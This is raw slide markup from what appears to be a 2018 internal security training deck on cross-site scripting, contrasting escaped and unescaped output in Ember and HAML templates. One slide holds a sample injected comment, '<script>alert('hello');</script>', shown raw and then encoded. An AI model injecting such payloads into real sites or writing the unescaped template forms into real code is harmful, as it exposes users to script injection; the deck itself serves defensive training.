          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1505"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6" name="duct-tape.jpg" descr="duct-tape.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="20000"/>
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="-600771"/>
            <a:ext cx="24384001" cy="16256001"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="307" name="“But it’s just temporary for a Hackday”"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="821531">
              <a:defRPr sz="9300"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>“But it’s just temporary for a Hackday”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="308"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30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310" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="311"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fast"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9" name="enigma.jpg" descr="enigma.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="20000"/>
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-27973" y="-1286612"/>
            <a:ext cx="24439947" cy="16289224"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1510" name="Encode on output."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Encode on output.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1511" name="PagerDuty_logo_WHITE.png" descr="PagerDuty_logo_WHITE.png"/>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1512"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513" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1514"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520" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6731103" y="1879509"/>
            <a:ext cx="10921794" cy="8682826"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="10921792" cy="8682824"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="1518" name="frame.png" descr="frame.png"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3">
              <a:extLst/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="10921793" cy="8682825"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1519" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="430139" y="1553973"/>
              <a:ext cx="10061515" cy="6764816"/>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solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1521"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1522"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523" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1524" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1525" name="Blog Post"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10665376" y="3495049"/>
            <a:ext cx="2959920" cy="113005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400">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Blog Post</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1526" name="Rich says: Love the post!…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7274657" y="4810981"/>
            <a:ext cx="4698679" cy="1006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2800">
                <a:solidFill>
                  <a:srgbClr val="53585F"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1"/>
              <a:t>Rich says:</a:t>
            </a:r>
            <a:r>
              <a:t> Love the post!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:srgbClr val="53585F"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>&lt;script&gt;alert('hello');&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1527" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-70233" y="8171515"/>
            <a:ext cx="24524466" cy="2891263"/>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1528" name="Love the post!…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1782024" y="8758308"/>
            <a:ext cx="20892691" cy="171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5200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Love the post!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="5200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;lt;</a:t>
            </a:r>
            <a:r>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;gt;</a:t>
            </a:r>
            <a:r>
              <a:t>alert(</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;#39;</a:t>
            </a:r>
            <a:r>
              <a:t>hello</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;#39;</a:t>
            </a:r>
            <a:r>
              <a:t>);</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;lt;</a:t>
            </a:r>
            <a:r>
              <a:t>/script</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1529" name="HTML"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20225611" y="85446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HTML</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3" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-44054" y="9376378"/>
            <a:ext cx="24472108" cy="1428338"/>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1534" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-282882" y="5639082"/>
            <a:ext cx="24836638" cy="1428339"/>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1535" name="is all it takes to ruin your day."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      is all it takes to ruin your day.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1536"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537"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538" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1539" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1540" name="Hello, {{{user.name}}}"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7793182" y="5888114"/>
            <a:ext cx="6434858"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5200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Hello, </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:satOff val="-3355"/>
                    <a:lumOff val="26614"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>{{{</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:satOff val="18648"/>
                    <a:lumOff val="5971"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>user.name</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:satOff val="-3355"/>
                    <a:lumOff val="26614"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>}}}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1541" name="Hello, {{user.name}}"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7627920" y="9625409"/>
            <a:ext cx="5993731"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5200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Hello, </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:satOff val="-3355"/>
                    <a:lumOff val="26614"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>{{</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:satOff val="18648"/>
                    <a:lumOff val="5971"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>user.name</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:satOff val="-3355"/>
                    <a:lumOff val="26614"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>}}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1542" name="{}"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571480" y="935037"/>
            <a:ext cx="2289523" cy="216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4000">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:satOff val="-3355"/>
                    <a:lumOff val="26614"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>{}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1543" name="EMBER"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20225611" y="97130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EMBER</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1544" name="EMBER"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20225611" y="59665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EMBER</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1545" name="https://gist.github.com/jamesarosen/478db5faef370eac43fb"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1051818" y="12544209"/>
            <a:ext cx="22381964" cy="44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000" u="sng">
                <a:solidFill>
                  <a:srgbClr val="25C151"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
                <a:hlinkClick r:id="rId4" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr u="none"/>
            </a:pPr>
            <a:r>
              <a:rPr u="sng">
                <a:hlinkClick r:id="rId4" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:rPr>
              <a:t>https://gist.github.com/jamesarosen/478db5faef370eac43fb</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1546" name="info-white.png" descr="info-white.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="735727" y="12616767"/>
            <a:ext cx="309895" cy="309894"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1549" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4261426" y="9136878"/>
            <a:ext cx="2025806" cy="2025806"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="2025805" cy="2025805"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1547" name="Circle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="2025806" cy="2025806"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="25C151"/>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sp>
          <p:nvSpPr>
            <p:cNvPr id="1548" name="✔"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="448583" y="363615"/>
              <a:ext cx="1230239" cy="1400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spcBef>
                  <a:spcPts val="5900"/>
                </a:spcBef>
                <a:defRPr sz="10000">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>✔</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1552" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4261426" y="5304630"/>
            <a:ext cx="2025806" cy="2346403"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="2025805" cy="2346402"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1550" name="Circle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="2025806" cy="2025806"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="C62818"/>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sp>
          <p:nvSpPr>
            <p:cNvPr id="1551" name="!"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="699657" y="107640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spcBef>
                  <a:spcPts val="5900"/>
                </a:spcBef>
                <a:defRPr b="1" sz="13000">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>!</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:gr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6" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-10187" y="9376378"/>
            <a:ext cx="24404374" cy="1428338"/>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1557" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6746" y="5639082"/>
            <a:ext cx="24370508" cy="1428339"/>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1558" name="!= &quot;Hello, #{user.name}&quot;"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7768476" y="5888114"/>
            <a:ext cx="7141369"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5200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>!= "Hello, </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:satOff val="-3355"/>
                    <a:lumOff val="26614"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>#{</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:satOff val="18648"/>
                    <a:lumOff val="5971"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>user.name</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:satOff val="-3355"/>
                    <a:lumOff val="26614"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:r>
              <a:t>"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1559" name="= &quot;Hello, #{user.name}&quot;"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7667304" y="9625409"/>
            <a:ext cx="6957889"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5200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>= "Hello, </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:satOff val="-3355"/>
                    <a:lumOff val="26614"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>#{</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:satOff val="18648"/>
                    <a:lumOff val="5971"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>user.name</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:satOff val="-3355"/>
                    <a:lumOff val="26614"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:r>
              <a:t>"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1560" name="is all it takes to ruin your day."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>   is all it takes to ruin your day.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1561"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562"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563" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1564" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1565" name="!"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="732137" y="1084408"/>
            <a:ext cx="1222550" cy="2162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4000">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:satOff val="-3355"/>
                    <a:lumOff val="26614"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1566" name="HAML"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20225611" y="97130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HAML</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1567" name="HAML"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
